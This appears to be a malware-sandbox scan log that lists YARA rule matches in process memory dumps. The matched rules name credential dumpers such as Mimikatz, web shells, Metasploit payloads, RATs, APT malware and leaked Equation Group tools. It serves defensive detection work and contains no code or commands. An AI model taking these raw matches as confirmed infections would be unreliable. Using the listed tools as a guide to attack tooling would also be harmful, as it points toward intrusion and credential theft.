Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware from Operation Cloud Hopper Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware from Operation Cloud Hopper Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Malware related to Operation Cloud Hopper - Page 25 Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Tools related to Operation Cloud Hopper Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects RevengeRAT malware Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Mimipenguin Password Extractor - Linux Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Word Dropper from Proofpoint FIN7 Report Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Invoke-WmiExec or Invoke-SmbExec Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Invoke-WmiExec or Invoke-SmbExec Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Auto-generated rule - from files Invoke-SMBExec.ps1, Invoke-WMIExec.ps1 Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Auto-generated rule - from files Invoke-SMBClient.ps1, Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Invoke-WMIExec.ps1 Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file WMImplant.ps1 Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Osiris Device Guard Bypass - file Invoke-OSiRis.ps1 Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects powershell script used in Operation Wilted Tulip Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a Windows scheduled task as used in Operation Wilted Tulip Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects hack tool used in Operation Wilted Tulip - Windows Tasks Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Compiled Impacket Tools Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file elgingamble Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file cmsd Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5 Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file eggbasket Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file sambal Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file envisioncollision Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file cmsex Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file DUL Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file slugger2 Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file jackpop Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1 Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file estesfox Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7 Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2 Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86 Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- from files funnelout.v4.1.0.1.pl Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7 Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Equation Group hack tool set Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects output generated by EQGRP scanner.exe Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: IEC-104 Interaction Module Program Strings Author: Dragos Inc
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects cloaked Mimikatz in VBS obfuscation Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects cloaked Mimikatz in JS obfuscation Author: Florian Roth
Source: 0000000A.00000003.323415245.0000000006628000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web shells - generated from file PHP1.php Author: Florian Roth
Source: 0000000A.00000003.323415245.0000000006628000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file h4ntu shell [powered by tsoi Author: unknown
Source: 00000013.00000003.458084749.0000000006D9C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file shankar.php.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 00000013.00000003.438854953.0000000006BFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 00000013.00000003.438854953.0000000006BFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt Author: Florian Roth
Source: 00000013.00000003.443343261.0000000006BFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 00000013.00000003.443343261.0000000006BFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt Author: Florian Roth
Source: 00000013.00000003.470647242.0000000006B9B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - file b37.php Author: Florian Roth
Source: 00000013.00000003.428675269.0000000006B79000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - file b37.php Author: Florian Roth
Source: 00000013.00000003.428675269.0000000006B79000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 0000000A.00000003.310922017.00000000050BA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php Author: Florian Roth
Source: 0000000A.00000003.310922017.00000000050BA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 0000000A.00000003.325437911.0000000006654000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1 Author: Florian Roth
Source: 0000000A.00000003.325437911.0000000006654000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 0000000A.00000003.322843197.000000000684B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - file cmdjsp.jsp Author: Florian Roth
Source: 0000000A.00000003.322843197.000000000684B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web shells - generated from file 404super.php Author: Florian Roth
Source: 0000000A.00000003.322843197.000000000684B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web shells - generated from file Asp.asp Author: Florian Roth
Source: 00000013.00000003.485624536.0000000006BFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 00000013.00000003.485624536.0000000006BFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt Author: Florian Roth
Source: 00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - from files Shell [ci Author: unknown
Source: 00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Volgmer malware as reported in US CERT TA17-318B Author: Florian Roth
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a process injection utility that can be used ofr good and bad purposes Author: Florian Roth
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects export from Gold Dragon - February 2018 Author: Florian Roth
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Lazarus malware from incident in Dec 2017 Author: Florian Roth
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Turla Agent.BTZ Author: Florian Roth
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malicious obfuscated VBS observed in February 2018 Author: Florian Roth
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file Scan Copy.pdf.com Author: Florian Roth
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Armitage component Author: Florian Roth
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Armitage component Author: Florian Roth
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware sample mentioned in the Silence report on Securelist Author: Florian Roth
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects unspecified malware sample Author: Florian Roth
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a command to execute PowerShell from String Author: Florian Roth
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: DLL implant, originally rights.dll and runs as a service Author: David Cannings
Source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000003.324870228.0000000006654000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1 Author: Florian Roth
Source: 0000000A.00000003.324870228.0000000006654000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 00000013.00000003.441709320.0000000006BFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 00000013.00000003.441709320.0000000006BFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt Author: Florian Roth
Source: 00000013.00000003.473662008.0000000006B9B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - file b37.php Author: Florian Roth
Source: 00000013.00000003.481442342.0000000006D9C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file shankar.php.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 0000000A.00000003.325135478.0000000006854000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file shankar.php.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - from files Shell [ci Author: unknown
Source: 00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 00000013.00000003.455300807.0000000006D6F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - file h6ss.php Author: Florian Roth
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Volgmer malware as reported in US CERT TA17-318B Author: Florian Roth
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a process injection utility that can be used ofr good and bad purposes Author: Florian Roth
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects export from Gold Dragon - February 2018 Author: Florian Roth
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Lazarus malware from incident in Dec 2017 Author: Florian Roth
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Turla Agent.BTZ Author: Florian Roth
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malicious obfuscated VBS observed in February 2018 Author: Florian Roth
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file Scan Copy.pdf.com Author: Florian Roth
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Armitage component Author: Florian Roth
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Armitage component Author: Florian Roth
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware sample mentioned in the Silence report on Securelist Author: Florian Roth
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects unspecified malware sample Author: Florian Roth
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a command to execute PowerShell from String Author: Florian Roth
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: DLL implant, originally rights.dll and runs as a service Author: David Cannings
Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000003.312201086.0000000006654000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1 Author: Florian Roth
Source: 0000000A.00000003.312201086.0000000006654000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - file cmdjsp.jsp Author: Florian Roth
Source: 0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web shells - generated from file 404super.php Author: Florian Roth
Source: 0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web shells - generated from file Asp.asp Author: Florian Roth
Source: 0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file shankar.php.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 00000013.00000003.470556930.0000000006B92000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 0000000A.00000003.308279629.00000000050AA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php Author: Florian Roth
Source: 0000000A.00000003.308279629.00000000050AA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php Author: Florian Roth
Source: 0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web shells - generated from file PHP1.php Author: Florian Roth
Source: 0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file h4ntu shell [powered by tsoi Author: unknown
Source: 0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.sh Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.asp Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-exe.vba Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.psh Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.aspx Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-exe.aspx Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.vbs Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.vba Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.ps1 Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-cmd.ps1 Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.hta Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects PowerShell ISESteroids obfuscation Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Reflective DLL Loader Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Reflective DLL Loader - suspicious - Possible FP could be program crack Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Reflective DLL Loader Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: VBScript cloaked as Favicon file used in Leviathan incident Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware from StoneDrill threat report Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware from StoneDrill threat report Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects EternalRocks Malware - file taskhost.exe Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects BeyondExec Remote Access Tool - file rexesvr.exe Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Pupy RAT Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects strings from OilRig malware and malicious scripts Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Industroyer related malware Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Industroyer related custom port scaner output file Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Industroyer related malware Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Industroyer related malware Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Red Sails Hacktool - Python Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware from Rehashed RAT incident Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Malware sample mentioned in Microcin technical report by Kaspersky Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ysoserial Payloads Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects CactusTorch Hacktool Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware from Operation Cloud Hopper Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware from Operation Cloud Hopper Author: Florian Roth
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Malware related to Operation Cloud Hopper - Page 25 Author: Florian Roth
